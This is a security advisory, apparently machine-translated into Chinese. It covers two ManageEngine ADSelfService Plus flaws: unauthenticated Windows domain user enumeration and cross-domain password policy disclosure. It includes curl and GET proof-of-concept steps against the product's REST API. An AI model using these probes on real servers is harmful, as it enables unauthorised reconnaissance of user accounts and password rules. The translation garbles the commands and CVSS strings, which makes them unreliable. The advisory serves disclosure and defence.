ManageEngine SelfService +多个漏洞

在研究cve - 2021 - 28958,站得住脚的发现多个漏洞ManageEngine ADSelfService + (ADSSP)构建6111。

1)Windows域用户存在的决心(cve - 2021 - 20147)
CVSS: 3.1 / AV: N /交流:L /公关:UI: N / N / S: U / C: L /我:N: N

ManageEngine ADSelfService + (ADSSP)允许一个未经身份验证的远程攻击者,以确定是否存在一个Windows域用户。攻击者可以实现这一目标有以下步骤:

#得到旋度配置域列表' http:// < adssp-host >: 8888 / RestAPI / AuthenticationAPI吗?操作= domainList ' #反应时存在一个域用户# oldPassword和newPassword参数需要通过域密码策略curl - s - d - o / dev / null - d ' oldPassword = Pw1@PwPolicy&newPassword = Pw2@PwPolicy&operation = UMCP&umcp = 1 &loginname = user1&domainName = <域> http:// < adssp-host >: 8888 / RestAPI / ChangePasswordAPI | grep HTTP HTTP / 1.1 200 OK #响应在一个域用户不存在# oldPassword和newPassword参数需要通过域密码策略curl - s - d - o / dev / null - d ' oldPassword = Pw1@PwPolicy&newPassword = Pw2@PwPolicy&operation = UMCP&umcp = 1 &loginname = no_such_user&domainName = <域> ' http:// < adssp-host >: 8888 / RestAPI / ChangePasswordAPI | grep HTTP HTTP / 1.1 500内部服务器错误

2)Windows域密码策略披露(cve - 2021 - 20148)
CVSS: 3.1 / AV: N /交流:L /公关:L / UI: N / S: U / C: L /我:N: N

ADSSP配置了多个Windows域时,从一个域的用户可以获得另一个域的密码策略有以下步骤:

——登录到http:// < adssp >: 8888 /凭证的用户在域——获取http:// < adssp >: 8888 / RestAPI / PasswordSelfServiceAPI吗?操作= verifyUser&PSS_OPERATION = aaa级;这应该返回一个列表的配置域——获取http:// < adssp >: 8888 / html / < domain_B_in_uppercase > _PasswordPolicy。html,用下划线代替点域名;例如,如果域B是foo。地方、获取FOO_LOCAL_PasswordPolicy.html